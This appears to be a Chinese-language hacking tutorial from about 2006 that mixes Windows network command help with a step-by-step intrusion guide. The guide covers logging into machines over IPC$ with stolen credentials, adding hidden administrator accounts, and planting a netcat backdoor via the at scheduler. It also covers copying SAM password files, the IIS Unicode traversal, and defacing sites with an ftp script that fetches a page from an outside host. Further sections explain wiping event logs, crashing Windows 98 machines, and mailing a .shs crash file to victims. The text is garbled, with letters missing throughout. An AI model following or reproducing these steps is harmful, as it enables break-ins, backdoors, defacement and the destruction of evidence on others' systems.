ARP -s 192.168.10.59 00-50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启
9.几个net命令
A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
比如:查看这个IP上的共享资源,就可以
C:\> et view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如:net use z: 2.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net se ion
C:\> et se ion
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
2.168.10.110 ROME Windows 2000 2195 0 00:03:12
2.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
netshint
interfaceip
interface i gt et add 本地链接 static IP地址 mask gateway
B.查看IP设置
interface i gt how addre 测试mtu
ping -f -l size 服务器ip
偶们最常用咯^_^
入侵命令详解
--------------------------------------------------------------------------------
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1
net use 7.0.0.1\ipc$ 123456 /user:hbx null密码为空
退出的命令是
net use 7.0.0.1\ipc$ /delete
--------------------------------
net share是查看主机共享资源我们用它建一个秘密共享目录吧net share me=c:\wi t\system32
这样这个机器就有了一个名为me的共享目录,而打开它就是wi t下的system32目录,如果你用win2000的系统就知这个目录有多重要了,如果不想要也好办net
share me /delete 呵呵,没有了,是不是很方便的埃
---------------------- ----------------------
----------------------
下面的操作你必须登陆后才可以用.登陆的方法就在上面.
---------------------- ----------------------
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators heibai /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.
net use z:7.0.0.1\c$
----------------------
net start telnet
这样可以打开对方的TELNET服务.
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
----------------------
net user guest /active:no这样这个guest的用户就又被禁用了
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
有人问到提高权限的问题 下面就解决下
net localgroup administrators guest /add
将guest变为administrator
net命令果然强大啊! net view命令看对方开了共享
-------------------------------------------------------------------------------------------------------------
net user是查看所有用户列表,看看哪个用户是和你一样偷跑进来的,给他名给删掉,让他美,net user 用户名
/delete哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛 net
localgroup
administrators就列出管理员组成员了,再查看一下administrator这个用户,因为这个是创建系统时建出来的,所以要看看他的系统是什么时间创建出来的
net user
administrator,然后再查看别的管理员用户是什么时间创建的,如果相差太远,那可能是被别人偷偷跑来偷建的,一律del,安全第一哦................
----------------------------------------------------------------------------------------------------------------------
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
----------------------
你首先要得到对方的时间,
net time 7.0.0.1
----------------------
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at 7.0.0.1 12:3 nc.exe
这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
-----------------------------------------------------
at命令功能强大,下面可以打个比方:
C:\ AT 22:30 Start C:\prettyboy.mp3
新加了一项作业,其作业 ID = 1 [现在我们新建立了一个任务 在22:30分 系统将自动播放歌曲]
----------------------------------------------------------------------------------------------------------------------
3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
----------------------------------------------------------------------------------------------------------------------
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我WWW.51.NET,不错的.当我们申请完后,...?约癋TP服务器.
在上传前需要登陆先,这里我们假设FTP服务WWW.51.NET,用户名是HUCJS,密码是654321
ftp www.51.net
他会要求输入用户,成功后会要求输入密码.
----------------------
下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\
get c:\index.htm d:\
假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下
put c:\index.htm d:\
--------------------------------------------------
这里的问题是两个命令的解释正好弄反了,登陆FTP服务器后get才是下载,而put命令是上传,这和tftp的命令正好相反,在tftp命令里get是上传put是下载,这下明白了吧,而且在FTP服务器中不能用c:\和d:\这样来指明路径,这也是在tftp里面用的方法,FTP可不会执行的,不信你去试好了,正确应该这样上传文件put
index.htm这样就足够了,装c盘根目录下的index.htm文件上传到FTP服务器的当前目录下,不喜欢就del
index.htm删掉这文件,下载时先查看一下目录,dir然后看这个目录里有什么,有你要的你就get
index.htm这样就把index.htm这个文件下载到你自己的c盘根目录下了。
--------------------------------------------------------------
get index.htm
c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
这句的解释里就没有出现错误,呵呵,看来那以前的还是马虎所至吧
好了,总算找出错处了吧,再说下面吧。
----------------------------------------------------------------------------------------------------------------------
下面我说说怎样把本地的文件复制到对方硬盘上去, 需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下
copy index.htm 7.0.0.1\c$\index.htm
----------------------
如果你要复制到D盘下 把C改为D, 就行了!
copy index.htm 7.0.0.1\d$\index.htm
----------------------
如果你要把他复制到 WINNT 目录里
就要把输入
copy index.htm 7.0.0.1\admin$\index.htm
admin$是wi t
---------------------
要把对方的文件复制过来,顺便告诉大家 NT的备份的数据库放在x:\wi t\repair\sam._ sam._是数据库的文件名
---------------------- ----------------------
下面就把127.0.0.1的数据库复制到本地C盘下
copy 7.0.0.1\admin$\repair\sam._ c:\
这个sam._这明显是NT主机的口令档,如果是win2000机器的口令文件应该是sam
----------------------------------------------------------------------------------------------------------------------
如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!
下面是我得到的结果!我来分析它,只是找主页在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;
DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Ste ing 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
script_NAME=/scripts/..%2f../wi t/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。
----------------------------------------------------------------------------------------------------------------------
7: tstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。
命令是 tstat -A XX.XX.XX.XX
-A一定要大写哦。
这个我认为大不大写没有太大差别,用处还是一样的。
之后用net use \对方IP 连接一下!
net view \对方IP 查看对方共享文件夹
net use X: \IP\对方共享文件 映射对方共享文件夹成为本机的X盘
这就是139端口的基本用法!不过前提是必须对方开共享!
netstat -n看看谁连接你
-----------------
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered
Registered Reg
istered Registered Registered Registered
MAC Addre = 00-E0-29-14-35-BA
PENTIUMII 00 UNIQUE
PENTIUMII 20 UNIQUE
ORAHOTOWN 00 GROUP
ORAHOTOWN 1C GROUP
ORAHOTOWN 1B UNIQUE
PENTIUMII 03 UNIQUE
INet~Services 1C GROUP
IS~PENTIUMII...00 UNIQUE
ORAHOTOWN 1E GROUP
ORAHOTOWN 1D UNIQUE
..__MSBROWSE__.01 GROUP
粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是 03 的话,那他前面的就是用户.
这里的用户是PENTIUMII。
没有03说明:MAC没和IP捆在一起了
----------------------------------------------------------------------------------------------------------------------
8:Shutdown
关了对方的NT服务器的命令
Shutdown \IP地址 t:20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。
Telnet进去用命令或者是本地用什么软件重启对方电脑
shutdown -m \计算机名称 可以远程重起或关闭的
--------------------------------------------------------------------------------
这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。
你可以本地试下。
--------------------------------------------------------------------------------
10:echo
著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。
我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖1写入index.htm,有2种方法,大家看看有什么区别。
-------------------------------------------------------
echo 南京大屠杀铁证如山,任何日本人不得抵赖!index.htm
echo 南京大屠杀铁证如山,任何日本人不得抵赖!index.htm
-------------------------------------------------------
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖1写进index.htm。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖1加到index.htm里面。
-------------------------------------------------------
“”产生的内容将追加进文件中,“”则将原文件内容覆盖。
这里说明一下,和是重定向命令只是一个是输入重定向另一个是输出重定向,比如我们在命令提示符下就会显示c:\这个意思就是把C盘的命令权重定向给我们,同样:也是定向的命令也叫作管道,它是用来连接两个命令的管道,先执行管道左边的命令,再执行管道右边的命令,不过我是没能耐把DOS命令说明白的,想研究就买本dos大全看吧,够看半年的了。
-------------------------------------------------------
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm
c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
---------------------------------------------
具体的做法:
输入 echo open upload.chinaren.com c:\cnhack.txt
输入 echo cnhack c:\cnhack.txt
输入 echo 39a c:\cnhack.txt
输入 echo get index.htm
c:\inetpub\wwwroot\index.htm++c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。)
等命令完成时,文件已经下载到你指定的文件里了。
-----------------------
注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)
记得要 del c:\cnhack.txt
--------------------------------------------------------------------------------
11:attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。
attrib -r index.htm
这个命令是把index.htm的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读
----------------------
attrib +r index.htm
这个命令是把index.htm的属性设置为只读。
----------------------------------------
attrib这个命令先要用来查属性,比如attrib 文件名,这样就显示出这个文件的属性了,它不止有R这个属性,其实一共有四种属性,
a 档案属性 r 只读属性 h隐含属性
s系统属性,我们想用哪个就用哪个,我觉得把我们上传的文件加个隐含属性更有意思,,,,,继续挑那贴的错.
----------------------------------------------------------------------------------------------------------------------
当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。
NT的日志有这些
del C:\wi t\system32\logfiles\*.*
del C:\wi t\ ytem32\config\*.evt
del C:\wi t\system32\dtclog\*.*
del C:\wi t\system32\*.log
del C:\wi t\system32\*.txt
del C:\wi t\*.txt
del C:\wi t\*.log
只要删除这些就可以了。有些系统NT***在D盘或其他盘,就要把C改成其他盘。
Internet信息服务FTP日志默认位置:%systemroot%\system32\logfiles\msft vc1\,默认每天一个日志
Internet信息服务WWW日志默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志
Scheduler服务日志默认位置:%systemroot%\schedlgu.txt
以上日志在注册表里的键:
应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog
有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。
Schedluler服务日志在注册表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
--------------------------------------------------------------------
del确实是删除文件用的,log也确实是日志文件类型,不过按上面这种方法是不可能清理掉你自身的日志的,因为系统自动运行着日志记录,你在做这些时它一直都在记录着,并没有停止,大家也会常看到,有时删除某个文件时会提示系统正在占用拒绝删除的,呵呵,这就明白了,系统正在运行的东西已经驻留内存里,当然不能这样删除掉了,大家怕了吧,这样删等于帮别人清理了日志,没删自己那份啊,哈哈哈哈,要问我怎么清理,我只说大家还是用小榕的工具来清吧,那个又快又好,我们何必去用那些烦琐的命令行呢,尤其对生长在windows桌面操作下的人们那显然是太麻烦了,我推荐小榕的elsave工具,清理日志又快又干净,还省电呢,嘻嘻,我可不是做广告来的。
-------------------------------------------------------------------------
借助第三方工具:如小榕的elsave.exe远程清除system,a licaton,security的软件,
使用方法很简单,首先利用获得的管理员账号与对方建立ipc会话,net use \ip pa /us
er: user
然后命令行下:elsave -s \ip -l a lication -C,这样就删除了安全日志。
其实利用这个软件还可以进行备份日志,只要加一个参数 -f filename就可以了,在此不再详述。
--------------------------------------------------------------------------------局域网要别人死机?
他C盘开了共享的话(win98,而且没有打补丁),你在DOS下输入
\他的IP或机器名\c\con\con
- 作者:
2006年06月19日, 星期一 11:56
网络基础知识大全 1)如何查看本机所开端口:
用netstat -a —n命令查看!再stat下面有一些英文,我来简单说一下这些英文具体都代表什么
LISTEN:侦听来自远方的TCP端口的连接请求
SYN-SENT:再发送连接请求后等待匹配的连接请求
SYN-RECEIVED:再收到和发送一个连接请求后等待对方对连接请求的确认
ESTABLISHED:代表一个打开的连接
FIN-WAIT-1:等待远程TCP连接中断请求,或先前的连接中断请求的确认
FIN-WAIT-2:从远程TCP等待连接中断请求
CLOSE-WAIT:等待从本地用户发来的连接中断请求
CLOSING:等待远程TCP对连接中断的确认
LAST-ACK:等待原来的发向远程TCP的连接中断请求的确认
TIME-WAIT:等待足够的时间以确保远程TCP接收到连接中断请求的确认
CLOSED:没有任何连接状态
2)如何获得一个IP地址的主机名?
利用ping -a i 命令查看!再第一行的pinging后面的 『ip』前面的英文就是对方主机名!
同样道理,利用ping machine_name也可以得到对方的ip
获得一个网站的ip地址的方法是:ping www.***.com
比如想知道sohu的ip,就用ping http://www.sohu.com/来查看就可以了
顺便说一句:如果返回:Reply from *.*.*.*: TTL expired i tra it的话,呵呵,代表TTL(生命周期)在传输过程中过期
什么意思呢?我来解释一下!
导致这个问题出现的原因有两个:1)TTL值太小!TTL值小于你和对方主机之间经过的路由器数目。 2)路由器数量太多,经过路由器的数量大于TTL值!
呵呵,其实这两点是一个意思!只不过说法不同而已!
3)如何查看本机的ip地址?
用ipconfig来查看就可以!
也可以再Windows中的开始菜单,运行中输入winipcfg,同样可以看到自己的ip
ipconfig命令后面如果加一个参数 /all的话,可以得到更加详细的资料,比如DNS、网关等……
4)再使用net命令的时候遇到一些错误代码,如何查看对应的错误信息?
用命令 et helpmsg erorr_code来查看就可以了
比如错误代码为:88
则查看命令为:net helpmsg 88 下面有这个错误代码的中文显示!
5)利用telnet连接到对方主机上,想获得一些系统信息,用什么命令?
set命令可以很好的完成你所需要收集信息的任务的!
方法:再cmd下直接输入set(telnet对方主机以后,也是直接set就可以了~然后能够得到NNNNN多的信息)
再这里,computername:呵呵,还用说么?主机名!
OS=Windows_NT :操作系统的类型哦~
path=C:\perl\bin\ :(perl的解释器位置!)
systemDrive=c: 操作系统盘符!
USERNAME=coldcrysky 当前登陆使用机器的用户
(6)跟踪路由器的命令是什么?
tracert 格式:tracert ip
中间会列出所有经过的路由器列表!这些路由器如果是暴露再防火墙外面的话,还可以看到路由的IP哦~呵呵(这里又涉及到了另外一个问题:为什么要把路由放在防火墙后面?原因呢,主要有两点:1)保护路由器!因为现在越来越多的攻击和入侵已经开始瞄准路由器了~如果直接把路由暴露在外面,呵呵,是非常危险的!被DoS了就不好了啊~呵呵,所以要放在防火墙里面;2)为路由器减少负担!如果所有的过滤功能统统都压在路由器上面,呵呵,路由器的负担就太大了!)
当然,利用pathping也可以达到同样效果!格式与tracert一样!
7)简单介绍一下cookie!
cookie,又名小甜点。
它的作用:记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……
最常见的是,大家再登陆论坛(邮箱)的时候,经常在输入第一个字母的时候,往往下面就显示出了所有在本机登陆过该论坛(邮箱)的用户名吧?呵呵,这个就是cookie的作用!
大家在Administrator的cookies目录中可以看到很多的记事本文档吧?这些都是cookie,虽然经过了加密,但是仔细查找的话,仍然能够看到一些敏感信息!况且现在也已经有了专门查看cookie的软件!利用这些软件,你的隐私将不保哦~
那么,如何清除cookie呢?一般情况下,可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮,点击就可以清楚掉了~
除此以外,还要在internet选项中的内容选项卡中找到自动完成按钮,把里面的四项都选中!然后点击清除表单,清除密码~
然后到操作系统目录所在的分区中!进入Wi t(98为windows)目录(当然了,这些都是默认的目录!如果你***的时候改名了,就对应的去相应目录)之后找到Temporary Internet Files目录(2000的目录在c:\Document and ettings\administrator\Local ettings\Temporary Internet Files)98直接到windows目录下找Temporary Internet Files就可以了~,找到这个文件夹后,打开!看到里面有NNNNNNNNNNNN多的文件了么?呵呵,这些是你浏览过的网页的记录(有的时候从网站上面看到漂亮的FLASH,可是不能保存怎么办?只要在线浏览一遍以后,断线到这里来找*.swf,之后依次打开查看的话,相信你会找到你所需要的FLASH的!),好了,跑题了~继续说:这些文件是网站的页面记录,直接删除就可以了!
另外,有没有彻底禁止cookie的方法呢?
呵呵,当然有了!在IE的Internet选项中,找到隐私选项卡!,把里面的滑块拖到最上面,边上写着:阻止所有cookie,呵呵,是不是?
另外一种方法:找到Windows目录下的cookies目录!把里面的txt文件全部删除!,最后应该只剩下一个index.dat文件!之后把这个文件夹设置成只读就可以了~
不过,禁止cookie后,大部分的论坛都无法正常登陆了啊!呵呵,到底禁止不禁止就看你自己的了~
8)***2000的时候,速度会特别特别特别慢,怎么加快***速度呢?
在DOS上面***,应该用98启动光盘来引导系统!然后按照下面的方法来做,可以提高***速度:
g:\cd window -------假设G为光驱 windows为98的***目录!
g:\window gt martdrv -------加载smartdrv程序!加载后没有任何提示信息!只要不返回错误信息就是加载成功了~这时候***2K的话,速度会很快的哦~
9)Windows2K密码忘记了,如何才能进入系统?
Windows2K的用户配置信息和密码保存在SAM文件里!该文件位于:c:\wi t\system32\config目录中!只要删除这个文件就可以了~
另外,在c:\wi t\repair目录中也同样有一个SAM文件(这个是前者的备份!)如果你在登陆肉鸡的时候,copy前面那个目录中的SAM文件,你会发现COPY不下来!呵呵,为什么?因为运行着的2K系统会保护SAM文件啊~这个时候你就COPY这个就可以了!
10)ping不到,tracert不到,但是却能用 tstat显示对方的一些信息,为什么?
因为tracert和ping命令使用的是ICMP协议!而 tstat是通过对方的netbios端口来获得对方的主机信息的!使用的是UDP和TCP协议!如果对方仅仅只对ICMP协议做了禁止的话,那通过这个命令获得系统信息是正常的!
11)telnet上去后,如何给对方开共享?
开共享的命令如下:net hare c=c:\wi t\system 返回共享成功
之后直接利用\\ip\c来访问对方的system目录了~删除共享用
share c /del 命令就可以了
12)如何判断对方的具体操作系统版本?
首先用ver命令查看对方的版本号!
如果是5.00.2195的话,为2K;5.1.2600为XP
从这里可以区分出来到底是2K还是XP了~下面进行更加具体的区分!
2K的pro和svr版本区分:
在telnet下,net hart查看启动的服务~如果对方开启了Terminal Services服务的话,基本上可以判断为svr以上的版本了~如果没有开启,则为pro!(具体方法有三种,因为前几天在论坛中我回复过暗界了~所以这里就不再重复了~)
XP的pro和home版的区分:
home edition是无法***iis的!所以,可以通过iis服务来判断到底是home版或者是pro了~
当然了,如果对方是pro,但是将iis删除(停用)的话,就没办法判断了~呵呵
13)如何查看98的随机启动的程序?
在98下有一个实用配置程序(msconfig),中文名为:系统配置实用程序,调用的方法是在:开始--运行中输入msconfig,在里面,有一个启动的选项卡,点击后,可以看到很多随即启动程序,如果前面带有钩的话,就是启动时随机启动的,取消的话就是把前面的小钩去掉就可以了~(如果在这里查看到了一些未知的启动文件--比如没有文件的具体路径,或者没有文件名的话,最好取消它的自启动!因为很有可能是木马!)
除了这里以外,还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文件!只不过在这里更方便查看而已!
14)设置了BIOS密码,可是却忘记了,该怎么办?
如果是可以进入Windows的话,可以找找bio wds和cmo wd这两个软件看看~
还有利用DEBUG法:
简单介绍两种:
1)-o 70 16
-o 71 13
2)-o 70 16
-o 71 16
另一种方法:copy法:
copy co cmos.com
输入下面10个字符:alt+176,alt+17,alt+230, ,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回车,退出,运行这个cmos.com程序就可以了~
恩,如果不能进入Windows怎么办呢?
简单介绍两种方法:
1)用通用密码:
Award Bios密码:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI ios密码:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
这是常见的密码,不妨试试~
如果不行的话,可以利用CMOS放电:
就是把主板上的电池取下来,等一会儿再插上去~
15)如何自制一个让98蓝屏的炸弹?
恩,这个是前几天QQ上面朋友问我的问题,整理的时候突然间想起来了,就写一下好了~
首先,打开Word,再插入菜单中选择对象,这时,弹出对象包装程序窗口,再这个窗口中,点击导入,随便找一个文本或者程序就可以!之后点:编辑菜单。这里选择命令行,出现一个命令行窗口,在里面协商c:\con\con,点击保存,完成后,再点编辑包中的复制包,把他随便到一个地方复制下来,之后看到的是一个名位片断的东西!给这个文件起一个名字,呵呵,传给那个可怜的家伙吧,等待他蓝屏,掉线!
(这个命令行中可以插入很多的命令,不见得非要用这个98蓝屏漏洞哦~)顺便说一下:这个已经不是什么新鲜的技术了,这个技术的名字叫做:碎片对象。呵呵,碎片?记忆碎片么?不是的!他的后缀是:.shs!之所以说一下这个,是因为有的朋友还不知道~做一个整理而已!不知道的朋友看过后就知道了,知道的朋友就权当复习了~另外,不要利用这个方法做破坏!否则后果自负!
16)如何再命令行下杀死对方进程?
利用微软的2K以上操作系统都是含有这个工具的!该工具包含在2K光盘的\su ort\tools文件夹下!里面有***程序,点击后,就***了2K的su ort tools工具包,里面有kill这个工具,这时候再cmd下可以输入kill/?,就可以看到帮助了,使用这个命令的格式是:kill id (pid是进程的ID号!)再任务管理器中可以看到进程的ID号!(不知道有几位朋友用过蓝色火焰?呵呵,用法跟这个一摸一样!还有很多类似的木马、后门软件都有类似的功能!这个是windows自带的大木马『后门工具』而已!)
这时候,有朋友问了,那再命令行下如何查看进程呢?呵呵,这就用到了系统自带的有一个后门工具了:再刚才说得那个目录中,还有一个工具叫tlist 看名字就能看出来是干什么的吧?用法更简单!直接输入tlist就可以得到pid遇队形程序的列表了~
那对方机器如果没有***这两个程序怎么办呢?没关系,你把你操作系统盘符下面programfiles\su ort tools目录下面的这两个对应的exe文件上传到对方的wi t\system32目录中就可以了!呵呵~
17)上次说了ping的基本用法,这次谈谈ping的命令参数!
这个是本次问题集的重点部分!无论是小鸟还是老鸟,你们能保证你真的对这些参数了如指掌么?恐怕都未必!还是好好看看吧!
这是TCP/IP协议中最有用的命令之一 它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。 Usage: ing [-t] [-a] [- count] [-l ize] [-f] [-i TTL] [-v TOS] [-r count] [- count] [[-j host-list] [-k host-list]] [-w timeout] destination-list Optio : -t Ping the ecifed host until interrupted.(除非人为中止,否则一直ping下去) -a Resolve addre e to hostnames.(把IP转为主机名) - count Number of echo request to end.(响应请求的数量) -l ize Send uffer ize.(封包的大小) -f Set Don`t Fragment flag i acket.(信息包中无碎片) -i TTL Time To Live.(时间) -v TOS Type Of Service.(服务类型) -r count Record route for count ho . - count Timestam for count ho . -j host-list Loose ource route along host-list. -k host-list Strict ource route along host-list.(较严格的……唉,怎么译好……算了,放着吧) -w timeout Timeout i millisecond to wait for each reply.(timeout的时间) 比如大家可能都知道的一个命令 # ing -f - 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。 其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。 18)如何查看本机的DNS服务器?
ipconfig其实是可以的(呵呵,上次就介绍过这个命令),除此以外,还可以利用一个命令:再cmd下输入netsh,进入到netsh提示符,再输入:int i 进入到interface i gt 然后再次输入dump,这时候屏幕上出现当前连接的配置情况了
这里必须介绍一下netsh到底是作什么用的!这个命令比较复杂,他包含了很多的子命令,所以这里只对部分命令进行讲解:
1)查看本机IP:首先键入netsh,再netsh提示符下输入:interface 回车 之后:i 回车 再之后:show addre 回车 这样,就可以看到当前连接的IP地址和子网掩码。(其实这个命令不如ipconfig简单,也不如ipconfig/all全面)
2)修改网络配置:接着上面的命令,我们使用:set addre ame=“本地连接” ource=static addr=192.168.0.200 mask=255.255.255.0,这样就修改了当前的IP地址,用show addre 来看看(或者用ipconfig)
3)显示一个完整的网络配置教本:
刚才说过,第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示网络配置上,还是有自己的特色的!例如:再interface i gt;状态下输入:dump,会显示一个清单,显示所有本地连接(不管你是否使用~)与netstat -an不完全一样!
这就是netsh的简单介绍和最基础的用法!希望大家能够掌握!还可以输入?来查看帮助!(要在netsh提示符下才能查看帮助啊~)
19)肉鸡上的部分文件无法删除,怎么办?
如果对方的文件夹是只读的话,会出现拒绝访问的字样!这时候,我们可以再del命令后面加上/f参数来删除!
20)再说一个可以限制用户登陆时间的命令!
再net命令中就可以实现这样的功能!具体方法如下:
假如我们打算让:coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆,用这个命令:
net user coldcrysky /timesunday-monday,08:00-16:00
之后利用net user coldcrysky命令来查看登陆时间的限制,可以看到是我们所规定的时间(因为是中文的,很容易懂,我就不多废话了)
在此,特别提醒各位:命令中:星期日才是一周的开始!!!不要当成星期一!
光说了怎么设置,如果想恢复回去怎么办呢?(就是恢复成默认状态,任何时间都可以登陆的状态)
看我的:net user coldcrysky /time:all --这样就可以了~
22)如何删除windows2K的默认贡献?
首先打开记事本,输入如下内容:
net hare c$ /delete
net hare d$ /delete
net hare e$ /delete
net hare f$ /delete
net hare g$ /delete
net hare ipc$ /delete
net hare admin$ /delete
这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~
之后点击保存成批处理文件(后缀为:bat的文件!)!加入到启动组中就可以了~
23)139端口的又一用法
